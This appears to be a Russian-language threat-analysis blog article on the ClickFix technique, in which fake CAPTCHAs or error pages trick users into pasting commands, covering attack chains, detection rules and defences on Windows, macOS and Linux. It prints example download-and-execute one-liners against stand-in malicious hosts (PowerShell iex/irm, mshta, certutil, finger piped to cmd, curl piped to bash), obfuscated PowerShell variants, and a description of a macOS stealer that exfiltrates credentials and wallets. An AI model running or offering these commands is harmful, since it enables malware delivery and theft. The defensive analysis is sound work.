Перейти к основному содержимому
  1. Статьи/

Взломайте себя сами: разбираем технику ClickFix

·10 минут·
Оглавление

Одной из заметных тенденций в ландшафте угроз последних двух лет стало массовое распространение атак, в которых ключевую роль играет не эксплойт, а сам пользователь, добровольно выполняющий вредоносную команду. В этой статье речь пойдёт о технике ClickFix — когда пользователь видит всплывающее окно с предложением выполнить определённые действия для исправления какой-то “проблемы” (например, для обновления браузера) либо для проверки, “что вы не робот”. Поддавшись на такой трюк, человек выполняет предложенные действия, то есть загружает и выполняет вредоносный код на своём компьютере. Злоумышленнику не требуется эксплуатировать уязвимости браузера или обходить механизмы безопасности ОС — достаточно убедить жертву выполнить пару кликов, которые выглядят как легитимная процедура.

Вариации атак на основе ложных сообщений об ошибках с предложением выполнить вредоносную команду известны уже много лет. Однако в 2025–2026 годах техника ClickFix получила широкое распространение благодаря массовым кампаниям, нацеленным на пользователей популярных сервисов (Google Meet, YouTube, Captcha-проверки). Ниже мы разберём механику атаки, типовые цепочки исполнения, возможности детектирования и способы противодействия.

Пример фальшивой капчи

Суть атаки
#

Общий принцип ClickFix сводится к следующей цепочке:

  1. Доставка. Злоумышленник любыми способами (вредоносная реклама, SEO-продвижение, сайты с бесплатным или пиратским софтом, фишинговые рассылки) заманивает жертву на сайт-заглушку.

  2. Легенда. Пользователь видит реалистичное сообщение об ошибке: «Ошибка загрузки страницы», «Не удалось пройти CAPTCHA», «Проблема с воспроизведением видео» или другое уведомление, адаптированное под контекст посещаемой страницы.

  3. Инструкция. Сайт предлагает «простое решение»: открыть окно Win+R, вставить подготовленную команду и нажать Enter. К этому моменту команда уже находится в буфере обмена жертвы — копирование происходит автоматически через JavaScript-обработчик (например, document.execCommand(copy)) на странице, и от пользователя требуется лишь вставить её (Ctrl+V) и выполнить.

  4. Исполнение. Команда загружает и запускает первую стадию полезной нагрузки. Дальнейшее развитие атаки зависит от конкретного злоумышленника: от кражи cookie-файлов и учётных данных до развёртывания полноценного RAT или шифровальщика.

Ключевой элемент атаки — социальная инженерия, при которой жертва добровольно выполняет действия, воспринимая их как легитимную техническую процедуру. Отсутствие необходимости эксплуатировать уязвимости делает ClickFix эффективной техникой против большинства современных ОС и браузеров независимо от уровня их обновлений.

Характерные команды
#

Задача вредоносной команды — быть короткой, простой для выполнения технически неподготовленным пользователем и, по возможности, не вызывать подозрений. Домен, с которого загружается нагрузка, визуально маскируется под связанный с «исправлением»: gooodsite[.]ai, gtasixdownload[.]com, captcha-verify[.]net и аналогичные (даны для примера, не являются реальными IOC-ами).

Типовые однострочники, наблюдаемые в ClickFix-кампаниях:

iex(irm example.com -UseBasicParsing)

mshta http://malicious-domain.com/payload.hta

certutil -urlcache -f http://malicious-domain.com/payload.exe %TEMP%\svchost.exe && %TEMP%\svchost.exe

Рассмотрим используемые механизмы подробнее.

PowerShell iex(irm …). Универсальный и наиболее распространённый вариант. Invoke-RestMethod (irm) загружает содержимое удалённого ресурса в память, Invoke-Expression (iex) исполняет его. Вся цепочка работает без сохранения файла на диск, что снижает вероятность обнаружения файловыми антивирусными сканерами. Параметр -UseBasicParsing отключает IE-движок парсинга и применяется для совместимости с чистыми редакциями Windows Server.

Mshta. Утилита mshta.exe — легитимный компонент Windows для запуска HTML-приложений (HTA). Является классическим примером Living-off-the-Land Binary (LOLBin). При вызове mshta http://... утилита загружает и исполняет HTA-файл по URL, который может содержать WScript, VBScript или JScript-код. Важно: mshta при запуске из окна Run создаёт дочерний процесс, что является ключевым событием для детектирования.

Certutil. Утилита certutil.exe предназначена для управления сертификатами, но поддерживает загрузку файлов по URL через ключи -urlcache и -verifyctl. Она не поднимает окно консоли и не требует elevated-привилегий для загрузки. Типовой паттерн: certutil -urlcache -f <url> <output_path> с последующим выполнением загруженного файла.

Curl / Wget. Эти утилиты присутствуют в современных сборках Windows (curl — начиная с Windows 10 1803), и их вызов из окна Run не требует установки дополнительного ПО. В Linux-средах curl ... | bash — стандартный вектор ClickFix, часто встречающийся на поддельных страницах установки dev-инструментов и CLI-утилит.

Изощрённые варианты
#

Помимо базовых однострочников, в реальных кампаниях встречаются более сложные цепочки:

cmd /c start "" /min cmd /c "finger gcaptcha@malicious.top | cmd"

Здесь используется утилита finger.exe — архаичный клиент протокола Finger (RFC 1288), всё ещё присутствующий в Windows. На первый взгляд команда не содержит явных признаков загрузки или исполнения кода — finger лишь запрашивает информацию о пользователе на удалённом хосте. Однако злоумышленник размещает в ответе Finger произвольный текст, который затем передаётся в cmd через пайп.

Другой вектор — злоупотребление поисковыми протоколами Windows, например командой search-ms: через Run, которая открывает окно поиска с предопределённым запросом к удалённому WebDAV-ресурсу, с которого загружается вредоносный ярлык.

Способы детектирования в Windows
#

Ядро ClickFix с точки зрения телеметрии — выполнение команды через окно Win+R, где родительским процессом выступает explorer.exe, а дочерний процесс — LOLBin (PowerShell, mshta, certutil, curl, wget, cmd), осуществляющий загрузку полезной нагрузки с удалённого хоста.

Реже встречаются запуски через адресную строку проводника (также порождает дочерний процесс от explorer.exe) и через меню быстрого доступа Win+X → Windows Terminal / PowerShel.

Идентификация запуска через Win+R
#

Окно Run (Win+R) реализуется через функциональность проводника, и факт его использования можно установить по наличию загруженной библиотеки tiptsf.dll в адресном пространстве процесса explorer.exe. Данный модуль (Touch Keyboard and Handwriting Panel Text Services Framework) загружается при активации любого поля ввода в проводнике, включая окно Run.

Дополнительный индикатор — содержимое ветки реестра HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, в которой сохраняется история выполненных через Run команд. Однако полагаться исключительно на этот артефакт не стоит: распространённой практикой в ClickFix-пейлоадах является очистка данной ветки на этапе пост-эксплуатации.

Детектирование LOLBin-активности
#

Общие правила (родительский процесс — explorer.exe):

ПроцессАртефакт/событиеУсловия
mshta.exeProcess Creation + Network ConnecКомандная строка содержит http://, https:// или ftp://
certutil.exeProcess Creation + Network ConnectКомандная строка содержит -urlcache, -verifyctl, или URL:
curl.exe, wget.exeProcess Creation + Network ConnectЛюбое сетевое соединение; запуск с параметрами, содержащими URL
powershell.exeProcess Creation + Network ConnectПараметры содержат отражённые вызовы (Reflective Load) или загрузку удалённого кода

Детектирование PowerShell
#

Детектирование PowerShell-активности в контексте ClickFix сопряжено с двумя проблемами:

  1. Высокий уровень легитимного шума. Массовое распространение установочных однострочников для AI-агентов, dev-инструментов и средств автоматизации (Codex, Claude, OpenClaw, Hermes, uv, pixi и др.) порождает большое количество срабатываний по паттерну «PowerShell + удалённая загрузка + explorer в родителях».

  2. Обфускация через рефлексию. Возможности PowerShell по косвенному вызову методов позволяют злоумышленникам модифицировать команды до неузнаваемости для статических сигнатур:

# Исходная команда
iex(irm example.com -UseBasicParsing)

# Обфусцированный вариант через Get-Command
& (Get-Command -Name 'Inv?ke-Express?on') (& (Get-Command -Name 'Inv?ke-RestMeth?d') 'http://example.com' -UseBasicParsing)

# Фрагментация IP-адреса
Write-Host (iex (irm ((('178.'+'16')+('.52.'+'232')))))

Базовые индикаторы для детектирования PowerShell-активности (родитель — explorer.exe, сетевое соединение):

  • Командная строка содержит: iex, iwr, irm, -w Hidden, Invoke-Expression, Invoke-WebRequest, Invoke-RestMethod, useb, UseBasicParsing, -UserAgent
  • Комбинация операторов конкатенации (+) с IP-адресами

Снижение FP-рейта
#

Для фильтрации ложных срабатываний эффективны следующие подходы:

Обогащение информацией о домене. Если командная строка содержит обращение к домену, зарегистрированному недавно (данные WHOIS), вероятность ClickFix значительно возрастает. Сервисы пассивного DNS и Threat Intelligence (VirusTotal, OpenTIP, AlienVault OTX) позволяют получить возраст домена и его репутацию.

Белый список легитимных однострочников. По данным телеметрии, следующие домены регулярно используются для легитимных установок через однострочники PowerShell и должны исключаться из правил детектирования:

chatgpt.com
openclaw.ai
jetbrains.com
claude.ai
ollama.com
//собственные ресурсы компании, на которых могут располагаться ПО\ps-скрипты или пакеты установки

Пограничный случай — raw.githubusercontent.com. Данный домен используется как в легитимных целях (например, установочный скрипт https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.ps1), так и злоумышленниками для хостинга пейлоадов. Исключение всего домена целиком не рекомендуется — необходим анализ конкретного пути и владельца репозитория.

Мета-детект через RunMRU
#

Комбинация мониторинга реестра RunMRU с телеметрией процессов позволяет выстроить более надёжный детект: если в RunMRU зафиксирована команда, содержащая вызов LOLBin с опасными командлетами, это является сильным индикатором ClickFix.

Следует учитывать, что злоумышленники могут очищать RunMRU в рамках пост-эксплуатационных действий, поэтому отсутствие записи не является надёжным индикатором «чистоты».

Детект через RunMRU

Общие рекомендации по противодействию
#

  1. Ограничение PowerShell. Включить политики ограничения запуска скриптов PowerShell: Constrained Language Mode, Script Block Logging, Module Logging. Активировать AMSI (Antimalware Scan Interface) для PowerShell. Настроить AppLocker или WDAC для ограничения запуска неподписанных скриптов.

  2. Отключение меню Run. Если окно Run не используется в организации, его можно отключить через Group Policy: User Configuration > Administrative Templates > Start Menu and Taskbar > Remove Run menu from Start Menu.

  3. Повышение осведомлённости пользователей. Информирование о том, что легитимные сервисы никогда не требуют открывать Win+R и выполнять команды для устранения ошибок.

  4. Мониторинг запуска LOLBin от explorer.exe. Настройка правил SIEM, отслеживающих процессы mshta.exe, certutil.exe, powershell.exe, curl.exe, wget.exe, cmd.exe с родительским процессом explorer.exe и параметрами, указывающими на загрузку с удалённого хоста.

  5. Эшелонированная защита. Комбинация хостовых детектов, политик ограничения ПО и регулярного аудита RunMRU позволяет существенно снизить вероятность успешной реализации ClickFix.

  6. Блокировка протокола Finger. Протокол Finger (TCP 79) обычно не используется в корпоративных средах и должен быть заблокирован на уровне межсетевого экрана наряду с другими устаревшими протоколами (rsh, rexec, rlogin).

ClickFix в MacOS
#

В отличие от Windows, где команда вставляется в окно Win+R, на macOS злоумышленники используют два способа:

  • Spotlight (⌘+Space): пользователю предлагают открыть поиск, ввести “Terminal” и запустить приложение.
  • Непосредственный запуск Терминала - из папки /Applications/Utilities/.

Ключевое отличие в том, что macOS-команда часто маскируется под «решение проблемы с капчей» или «обновление системных настроек», что снижает бдительность даже опытных пользователей. Типовой сценарий атаки:

  1. Определение ОС: сайт-заглушка анализирует User-Agent жертвы и отдаёт страницу, оптимизированную под macOS.

  2. Фальшивая CAPTCHA: пользователь видит привычную проверку «Я не робот». После клика JavaScript копирует в буфер обмена вредоносную команду и перенаправляет на страницу с инструкцией.

  3. Пользователю предлагают: открыть Spotlight (⌘+Space), запустить терминал и вставить скопированную команду (Ctrl+V или ⌘+V) и нажать Enter.

Вредоносная команда для macOS
  1. Выполнение: команда запускает односложную цепочку в bash, которая создаёт временный .dmg-файл в /tmp через mktemp, затем скачивает вредоносный DMG с удалённого сервера с помощью curl –fsSL и монтирует образ, скрытно, через hdiutil attach -nobrowse, обходя Finder. Далее, ищет и запускает встроенный в DMG .app с помощью find и open.

После запуска приложение показывает поддельный диалог System Preferences, чтобы выманить пароль администратора, создаёт скрытую папку ~/.hlpr и собирает данные из Chromium- и Firefox-подобных браузеров, криптокошельков, мессенджеров Telegram и Discord, Apple Notes, связки ключей macOS и документы с расширениями .pdf, .txt, .rtf.

Все собранные сведения упаковываются в ZIP-архив с помощью ditto и отправляются на C2-сервер через curl -X POST /api/reports/upload. Для закрепления в системе устанавливается LaunchAgent com.hlpr.agent.plist, обеспечивающий автоматический перезапуск при входе пользователя, а затем вредонос скачивает и заменяет легитимные приложения Ledger Live и Trezor Suite в /Applications, что позволяет перехватывать криптовалютные транзакции даже после попыток очистки системы.

Детектирование в MacOS
#

Детектирование на macOS строится вокруг злоупотребления встроенными утилитами и уникальными возможностями ОС. Основные паттерны для детектирования:

  1. Запуск /hdiutil с параметрами attach и -nobrowse
  2. Использование /osascript с параметрами display dialog и with hidden answer
  3. Упаковка архивов через ditto с параметрами -c -k --sequesterRsrc
  4. Выполнение /bash с цепочкой команд, содержащей mktemp, curl, hdiutil, open и .dmg
  5. Запуск /dscl с параметром -authonly

ClickFix в Linux
#

ClickFix не ограничивается Windows и MacOS — техника активно адаптируется под Linux-среды, и по данным исследователей из Huntress, в 2026 году ClickFix составлял более половины всей активности malware loader. Схема идентична: жертва заманивается на сайт-заглушку, в буфер обмена через JavaScript копируется команда, после чего пользователю предлагается вставить её в терминал.

Особенности Linux-потока
#

В отличие от Windows, где используется окно Win+R, на Linux-хостах в роли «проводника» команды выступает либо терминал, либо диалог быстрого запуска приложений, открываемый комбинацией Alt+F2 (аналог Run в графических оболочках GNOME/KDE). Пример фальшивой капчи, использованной при атаке на индийское министерство:

Фальшивая капча

Типовой сценарий атаки:

  1. Сайт определяет ОС жертвы (по UA) и отдаёт соответствующую страницу.
  2. На странице отображается фальшивая CAPTCHA с кнопкой «I’m not a robot».
  3. По клику JavaScript копирует команду в буфер обмена и перенаправляет пользователя на страницу с инструкцией: нажать Alt+F2, вставить (Ctrl+V) и выполнить (Enter).
  4. Команда загружает shell-скрипт, выставляет ему бит исполнения через chmod +x и немедленно запускает.

Характерные однострочники:


curl -s hxxp://malicious-domain[.]com/payload.sh | bash

wget -qO- hxxp://malicious-domain[.]com/install.sh | sh

curl -s hxxp://malicious-domain[.]com/mapeal.sh -o /tmp/m.sh && chmod +x /tmp/m.sh && /tmp/m.sh

Детектирование в Linux
#

Телеметрия Linux-хоста принципиально отличается от Windows, основными источниками выступают auditd (execve-события), журнал процесса cmdline в eBPF-агентах (Falco, Tetragon, Tracee), а также логи оболочки (Shell History) и сетевая телеметрия.

Ключевые поведенческие индикаторы:

  • Цепочка родитель-потомок. Запуск bash/sh/zsh от графической оболочки (в случае Alt+F2 — от gnome-shell или аналога DE) с командной строкой, содержащей curl/wget, пайп в интерпретатор или chmod +x.
  • Fileless-исполнение. Командная строка, сочетающая скачивание (curl -s, wget -qO-), упаковку (base64, gzip) и eval, либо прямую передачу в оболочку через пайп.
  • Перенаправление вывода. Маркеры exec </dev/null, exec >/dev/null, 2>&1, >/dev/null, характерные для скрытого выполнения.

Заключение
#

ClickFix представляет собой элегантный пример эволюции социальной инженерии, эксплуатирующий фундаментальную особенность взаимодействия пользователя с ОС: окно Run, задуманное как инструмент продуктивности, не требует elevated-привилегий и не вызывает у неподготовленного пользователя подозрений. Эффективность атаки подтверждается её массовым распространением в 2025–2026 годах.

С точки зрения защиты, ClickFix обнаруживается на нескольких уровнях одновременно: хостовом (запуск LOLBin от explorer.exe), поведенческом (аномальная цепочка родитель-потомок, совпадающая с записями в RunMRU) и артефактном (RunMRU, tiptsf.dll, история браузера). Комбинация этой телеметрии с правилами корреляции в SIEM-системах позволяет выявлять атаки ClickFix на ранних стадиях — до того, как злоумышленник перейдёт к пост-эксплуатации.

Ключевой вывод: атаки, в которых пользователь выступает активным соучастником собственной компрометации, не могут быть полностью предотвращены техническими средствами и требуют комплексного подхода, сочетающего хостовые политики, сетевой мониторинг и регулярное повышение осведомлённости сотрудников.

Related